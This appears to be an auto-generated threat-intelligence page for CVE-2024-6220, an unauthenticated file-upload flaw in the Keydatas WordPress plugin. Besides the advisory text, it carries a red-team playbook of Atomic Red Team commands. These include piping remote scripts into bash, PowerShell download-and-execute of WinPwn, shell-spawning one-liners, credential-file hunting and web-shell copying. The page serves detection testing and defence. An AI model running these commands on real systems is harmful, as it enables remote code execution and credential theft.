CVE-2024-6220
Overview
This vulnerability is an arbitrary file upload flaw caused by insufficient input validation within the keydatas_downloadImages function of the Keydatas WordPress plugin. The root cause is the absence of proper file type verification, allowing unfiltered files to be accepted and stored on the server. The affected component is the Keydatas plugin, versions up to and including 2.5.2, specifically its image download functionality.
Vulnerability Description
The 简数采集器 (Keydatas) plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the keydatas_downloadImages function in all versions up to, and including, 2.5.2. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected site's server which may make remote code execution possible.
Impact
An unauthenticated attacker can upload arbitrary files to the affected server, potentially enabling remote code execution and full system compromise. No privileges or user interaction are required, and network access to the WordPress site is sufficient. This can lead to unauthorized data access, website defacement, or persistent backdoor installation. The CVSS vector (AV:N/AC:L/PR:N/UI:N) confirms the ease of exploitation and high impact on confidentiality, integrity, and availability.
Solution
Users should upgrade the Keydatas plugin to a version later than 2.5.2 where the file upload validation issue is resolved. Detailed patch information and remediation guidance are available via the Wordfence advisory at https://www.wordfence.com/threat-intel/vulnerabilities/id/49ae7971-7bdf-4369-b04b-fb48ea5b9518. Reviewing the plugin’s changelog and applying the latest updates from the official WordPress plugin repository is recommended to mitigate this vulnerability.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerability present in the Keydatas plugin for WordPress arises from inadequate file type validation within the keydatas_downloadImages function. This oversight allows unauthenticated users to upload arbitrary files to the server hosting the affected WordPress site. The lack of stringent checks on the file types being uploaded means that an attacker can exploit this weakness to upload malicious scripts or executables disguised as benign file types, such as images. Once these files are successfully uploaded, they can be executed on the server, potentially leading to remote code execution, data breaches, or complete server compromise.
Attack vectors for this vulnerability are particularly concerning due to the ease with which an attacker can exploit it. An attacker does not require authentication to initiate the file upload process, significantly lowering the barrier to entry. By crafting a malicious request to the vulnerable endpoint, an attacker can upload a web shell or other harmful payloads. Once the malicious file is on the server, the attacker can execute it, gaining unauthorized access to the server's filesystem and potentially escalating privileges to control the entire environment. This exploitation could also lead to further attacks on connected systems or the exfiltration of sensitive data.
The real-world impact of this vulnerability can be severe, particularly for organizations that rely on WordPress for their online presence. A successful exploitation could lead to data breaches, loss of customer trust, and significant financial repercussions due to remediation efforts and potential legal liabilities. Businesses may also face reputational damage, as customers and partners may lose confidence in their ability to safeguard sensitive information. Additionally, the compromised server could be leveraged for further attacks, such as distributing malware or participating in botnets, which can have cascading effects on other organizations and users.
To detect and mitigate the risks associated with this vulnerability, organizations should implement a multi-faceted approach. First, regular security audits and vulnerability assessments should be conducted to identify outdated plugins and themes, ensuring that all components of the WordPress installation are up to date. Employing a web application firewall (WAF) can help filter out malicious requests and block attempts to exploit this vulnerability. Furthermore, implementing strict file upload policies that validate file types and restrict uploads to only necessary formats can significantly reduce the risk. Additionally, organizations should monitor server logs for unusual activity that may indicate an attempted exploitation of this vulnerability.
In conclusion, the vulnerability in the Keydatas plugin presents a critical risk to WordPress installations, with the potential for severe consequences if exploited. Organizations must prioritize the security of their web applications by adopting proactive measures to detect, mitigate, and respond to such vulnerabilities. By ensuring that file upload functionalities are properly secured and regularly reviewing their security posture, businesses can protect themselves from the significant risks posed by this and similar vulnerabilities.
CSURFACE threat intelligence has identified a marked escalation in detection activity related to CVE-2024-6220, with telemetry indicating a significant upward trend in attempts to exploit the arbitrary file upload vulnerability within the Keydatas WordPress plugin. This increase in observed activity corresponds with a notable rise in the EPSS score, signaling growing attacker interest and a heightened likelihood of exploitation in the near term. Although no new exploit variants or proof-of-concept code have surfaced, the amplification in reconnaissance and attack attempts suggests adversaries are actively probing affected environments, potentially to establish footholds or execute remote code. For defenders, this evolving threat landscape underscores an urgent need to intensify monitoring and incident response efforts around vulnerable WordPress instances. The risk level has consequently shifted to a more imminent threat posture, reflecting increased exploitation attempts that elevate the probability of successful compromise if mitigations are not promptly enforced.
Update 2 — June 19, 2026
CSURFACE threat intelligence has identified a modest uptick in detection activity related to CVE-2024-6220, indicating that adversaries continue to probe vulnerable WordPress environments. Despite this increase in observed attempts, the EPSS score has notably declined, suggesting a reduced likelihood of widespread exploitation in the immediate term. This divergence implies that while reconnaissance and opportunistic scanning persist, active exploitation campaigns have not accelerated correspondingly. For defenders, this nuanced shift highlights a persistent but currently less aggressive threat posture, underscoring the importance of sustained vigilance without immediate escalation in incident severity. The threat level remains critical due to the vulnerability’s inherent risk, but the current telemetry suggests a stabilization rather than an intensification of exploitation efforts.
Update 3 — July 16, 2026
CSURFACE threat intelligence has detected a modest increase in activity related to CVE-2024-6220, indicating a slight rise in attempts to leverage the arbitrary file upload vulnerability within the 简数采集器 plugin. While this uptick does not represent a dramatic surge, it signals persistent interest from threat actors in exploiting this critical flaw. The stability of the EPSS score alongside this incremental detection trend suggests that exploitation efforts remain measured rather than aggressive, with no new exploit techniques or widespread campaigns emerging at this time. For defenders, this development underscores the ongoing risk posed by the vulnerability and the necessity to maintain vigilant monitoring, as opportunistic scanning and probing continue. The threat level remains critical due to the vulnerability’s potential for remote code execution, but the current telemetry indicates a steady-state threat environment rather than an escalation, allowing security teams to prioritize resources accordingly.
Affected Products (1)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Keydatas | Keydatas | All |
cpe:2.3:a:keydatas:keydatas:*:*:*:*:*:wordpress:*:*
|
Exploits
No exploits found for this CVE.
Threat Feed
10 eventsSighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
| ID | Name | ML Conf. | Likelihood | Severity | Link |
|---|---|---|---|---|---|
| CAPEC-1 | Accessing Functionality Not Properly Constrained by ACLs |
35%
|
High | High |
Red Team Playbook
44 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
xcopy /I /Y "#{web_shells}" #{web_shell_path}
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (4)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2024-6220 |
| wordfence.com |
GitHub CVE
|
https://www.wordfence.com/threat-intel/vulnerabilities/id/49ae7971-7bdf-4369-b04b-fb48ea5b9518?source=cve |
| plugins.trac.wordpress.org |
GitHub CVE
|
https://plugins.trac.wordpress.org/browser/keydatas/trunk/keydatas.php |
| plugins.trac.wordpress.org |
GitHub CVE
|
https://plugins.trac.wordpress.org/changeset/3127334/keydatas?contextall=1 |